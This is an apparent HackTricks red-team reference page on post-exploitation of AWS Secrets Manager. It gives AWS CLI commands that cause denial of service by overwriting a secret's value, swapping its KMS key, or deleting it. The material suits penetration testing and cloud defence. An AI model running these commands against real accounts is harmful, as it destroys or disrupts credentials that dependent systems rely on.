AWS - Secrets Manager Post Exploitation

Reading time: 2 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Secrets Manager

For more information check:

AWS - Secrets Manager Enum

Read Secrets

The secrets themself are sensitive information, check the privesc page to learn how to read them.

DoS Change Secret Value

Changing the value of the secret you could DoS all the system that depends on that value.

warning

Note that previous values are also stored, so it's easy to just go back to the previous value.

bash
# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
    --secret-id MyTestSecret \
    --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS Change KMS key

bash
aws secretsmanager update-secret \
    --secret-id MyTestSecret \
    --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Deleting Secret

The minimum number of days to delete a secret are 7

bash
aws secretsmanager delete-secret \
    --secret-id MyTestSecret \
    --recovery-window-in-days 7

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks